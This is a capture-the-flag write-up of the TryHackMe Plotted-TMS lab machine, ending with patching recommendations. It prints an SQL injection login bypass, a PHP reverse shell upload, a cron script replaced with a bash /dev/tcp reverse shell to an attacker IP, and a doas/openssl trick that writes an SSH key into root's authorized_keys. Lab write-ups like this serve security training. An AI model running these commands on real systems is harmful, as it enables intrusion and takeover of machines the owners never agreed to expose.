Skip to main content
  1. writeup-ctf/

Writeup - Plotted-TMS (THM)

·528 words·3 mins·
Table of Contents

This is a writeup for the Plotted-TMS machine from the TryHackMe site.

Enumeration
#

First, let’s start with a scan of our target with the following command:

nmap -sV -T4 -Pn 10.10.173.55

Three TCP ports are discovered:

  • 22/tcp : SSH port (OpenSSH 8.2)
  • 80/tcp : HTTP web server (Apache 2.4.41)
  • 445/tcp : HTTP web server (Apache 2.4.41)

Exploit
#

I start by listing the directories of the site hosted on port 445:

We find a management page that gives us access to an admin login page.

After a few injection tests I finally managed to connect with the following injection:

Username = ' or 1=1;-- -

I now have access to the admin panel of the site.

In this panel I find the Settings page. This page allows to change the font image of the home page of the site. So I try to send a PHP reverse shell.

Then I access it via the following address:

http://10.10.173.55:445/management/uploads/

I now have a reverse shell with the user www-data.

After some research I find that the first flag is in the personal folder of the user plot_admin, problem I do not have the right to read it. So I will have to find a way to change the user.

After launching linPeas on the machine I find that every minute a script backup.sh is launched by the user plot_admin.

I don’t have the permissions to change the content of the script, but I have the permissions to change the content of the /var/www/scripts folder. So I will be able to replace the current script, by a custom script allowing me to have a reverse shell as plot_admin.

To do this I use the following commands:

mv backup.sh tmp
touch backup.sh
echo "bash -c '/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1'" > backup.sh
chmod +x backup.sh

I now have a reverse shell with the user plot_admin and I can get the first flag.

Privilege escalation
#

I start by listing the SUID files with the following command:

find / -perm -u=s -type f 2>/dev/null

I found a command not very common: doas. This command is an alternative to the sudo command. After some research I find on this site that the config file of this command is at the following address: /etc/doas.conf.

I find that my user can execute the openssl command with admin rights. So I’m looking on GTFOBins for exploits related to this command.

I find that it is possible to write in files, so I will be able to add to ssh key in the authorized_keys file and then connect via SSH to the root account.

To do this I use the following commands:

FILE=/root/.ssh/authorized_keys
echo "ssh-rsa [key] kali@kali" | doas openssl enc -out "$FILE"

I now have a shell root shell and can retrieve the last flag.

Recommendations
#

To patch this host I think it would be necessary to perform a number of actions:

  • Fix the site code to avoid SQL injections (OWASP SQL Injection)
  • Implement code detection in the admin panel image uploads
  • Store CRON scripts in a folder accessible only by the author
  • Do not allow root rights on commands that do not require it

Related

Writeup - Delivery (HTB)
·1009 words·5 mins
Writeup - Active (HTB)
·426 words·2 mins
Writeup - Previse (HTB)
·964 words·5 mins